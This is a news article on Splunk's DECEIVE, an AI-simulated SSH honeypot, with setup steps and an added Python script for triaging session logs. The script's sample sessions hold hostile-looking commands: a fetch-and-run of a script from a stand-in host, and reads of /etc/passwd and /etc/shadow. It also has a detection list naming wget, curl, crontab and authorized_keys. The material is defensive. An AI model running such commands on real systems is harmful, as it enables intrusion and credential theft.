Thursday, May 1, 2025

Splunk Introduces “DECEIVE” an AI-Powered Honeypot to Track Cyber Threats


Splunk has unveiled DECEIVE (DECeption with Evaluative Integrated Validation Engine), an innovative, AI-augmented honeypot that mimics real-world systems to lure and study cyber attackers.

By leveraging advanced artificial intelligence, DECEIVE provides organizations with a powerful means of tracking, analyzing, and understanding malicious activities in real time, offering actionable insights into attacker tactics and techniques.

Revolutionizing Cybersecurity with DECEIVE

Traditional honeypots require significant effort to simulate realistic environments; they must be seeded with credible data and software to effectively engage attackers.


DECEIVE eliminates this challenge by using AI to create highly believable, customizable system simulations.

This approach lets enterprises detect and investigate cyber threats while keeping the overhead of running the honeypot minimal.

DECEIVE is designed to emulate a Linux server accessible via the SSH protocol, logging all user activity, analyzing attacker behavior, and categorizing sessions as benign, suspicious, or malicious.

The lightweight and intuitive design is particularly useful for cybersecurity research, training, and internal testing.

Key Features Include:

  • AI-Powered Realism: DECEIVE uses AI to simulate operating environments based on user-configurable prompts, making tailored honeypots easy to deploy.
  • Comprehensive Logging: All username, password, and command inputs, as well as AI-generated responses, are logged to offer complete session insights.
  • Intelligence-Driven Analysis: Sessions are automatically classified into benign, suspicious, or malicious based on attacker actions.
  • Cross-Platform Support: Initially developed for macOS 15 (Sequoia), DECEIVE also runs on most UNIX-like systems, including Linux and Windows (via Windows Subsystem for Linux).

Getting Started with DECEIVE

To set up DECEIVE, users can follow these steps:

  1. Clone the Repository:
    Fetch the latest version of DECEIVE from its GitHub repository with this command:
    git clone https://github.com/splunk/DECEIVE
  2. Install Dependencies:
    Ensure Python 3 is installed, then install the required Python modules with this command:
    pip3 install -r requirements.txt
  3. Generate SSH Host Keys:
    Create the SSH host keypair the honeypot will present to connecting clients:
    ssh-keygen -t rsa -b 4096 -f SSH/ssh_host_key
  4. Configure the Honeypot:
    • Copy the configuration template:
    cp SSH/config.ini.TEMPLATE SSH/config.ini
    • Edit the SSH/config.ini file to define system behavior, including the usernames and passwords attackers may attempt to use.
    • Customize the SSH/prompt.txt file to describe the system being emulated. For example, you can specify:
    “You are a video game developer’s system containing realistic source and asset files.”
  5. Start the Server:
    Launch the honeypot by running the following command from the SSH directory:
    python3 ./ssh_server.py

The server will listen for SSH connections on the configured port, silently logging all activity.
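As an added example (not part of the DECEIVE project), the following Python script triages the kind of session log such a honeypot produces: it counts verdicts, surfaces the most-tried credential pairs and commands, and cross-checks any session the AI judged benign against a fixed list of sensitive command fragments, since the verdict is a model output and should not be trusted blindly. The JSON-lines layout, field names and sample records are constructed assumptions, not DECEIVE's actual log format.

```python
import json
from collections import Counter

# Constructed sample log (assumed layout, not the project's own format).
SAMPLE_LOG = """
{"session": "a1", "src_ip": "203.0.113.5", "username": "root", "password": "123456", "commands": ["uname -a", "cat /etc/passwd"], "judgement": "suspicious"}
{"session": "a2", "src_ip": "203.0.113.5", "username": "admin", "password": "admin", "commands": ["wget http://example.invalid/x.sh", "chmod +x x.sh", "./x.sh"], "judgement": "malicious"}
{"session": "a3", "src_ip": "198.51.100.9", "username": "dev", "password": "dev", "commands": ["ls", "cat README.md"], "judgement": "benign"}
{"session": "a4", "src_ip": "198.51.100.9", "username": "dev", "password": "dev", "commands": ["cat /etc/shadow"], "judgement": "benign"}
"""

# Command fragments that should never appear in a session the AI called benign.
SENSITIVE = ("/etc/shadow", "wget ", "curl ", "chmod +x", "crontab", ".ssh/authorized_keys")


def parse_sessions(text):
    """Parse one JSON record per line; a malformed line is skipped, not fatal."""
    sessions = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            sessions.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return sessions


def summarize(sessions):
    """Verdict counts plus the most common credential pairs and commands."""
    verdicts = Counter(s.get("judgement", "unknown") for s in sessions)
    creds = Counter((s.get("username"), s.get("password")) for s in sessions)
    cmds = Counter(c for s in sessions for c in s.get("commands", []))
    return {"verdicts": dict(verdicts),
            "top_credentials": creds.most_common(5),
            "top_commands": cmds.most_common(5)}


def sources_to_review(sessions):
    """Source addresses with at least one malicious verdict."""
    return sorted({s["src_ip"] for s in sessions if s.get("judgement") == "malicious"})


def second_opinion(sessions):
    """Session ids the AI judged benign although a command touches a sensitive item."""
    return [s["session"] for s in sessions
            if s.get("judgement") == "benign"
            and any(tok in c for c in s.get("commands", []) for tok in SENSITIVE)]


if __name__ == "__main__":
    sessions = parse_sessions(SAMPLE_LOG)
    print(json.dumps(summarize(sessions), indent=2))
    print("review sources:", sources_to_review(sessions))
    print("benign verdicts to re-check:", second_opinion(sessions))
```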

Splunk emphasizes that DECEIVE is a proof-of-concept and not yet production-grade. While the tool is invaluable for threat analysis, it must be deployed cautiously, as it logs sensitive information, such as usernames and passwords, for research purposes.

The project is open-source and available under the MIT license, encouraging contributions from the cybersecurity community. Developers and researchers can access the code, suggest improvements, or adapt DECEIVE to meet specific use cases.

The launch of DECEIVE underscores Splunk’s commitment to enhancing defensive cybersecurity measures.

By flipping the script and studying attackers in action, organizations can stay a step ahead in the ever-evolving threat landscape.


Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
